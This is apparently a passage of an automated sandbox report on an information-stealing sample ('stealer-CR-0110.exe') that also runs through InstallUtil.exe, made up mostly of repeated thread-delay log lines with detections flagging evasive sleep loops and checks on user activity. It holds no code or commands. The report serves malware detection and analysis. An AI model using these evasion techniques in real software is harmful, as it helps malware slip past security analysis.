Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595867	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598883	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598664	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596310	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596029	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595918	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595696	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595445	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595335	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594303	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593873	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593327	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Window / User API: threadDelayed 4959	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Window / User API: threadDelayed 4684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Window / User API: threadDelayed 2712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Window / User API: threadDelayed 3057	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 4411	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5390	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 6004	Thread sleep count: 4959 > 30	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 1412	Thread sleep count: 4684 > 30	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 6428	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 2284	Thread sleep count: 2712 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 2284	Thread sleep count: 3057 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -599076s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598966s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598712s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598244s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597193s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596948s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596698s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596567s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596230s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -596108s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -595982s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -595867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2300	Thread sleep count: 4411 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2300	Thread sleep count: 5390 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598998s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598883s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598773s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598664s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597193s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596699s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596432s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596153s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -596029s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595918s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595696s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595445s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595335s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595216s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594452s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594303s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593873s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593764s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2072	Thread sleep time: -593327s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599076	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598244	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596698	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596567	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596230	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596108	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595982	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595867	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598883	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598664	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598218	Jump to behavior
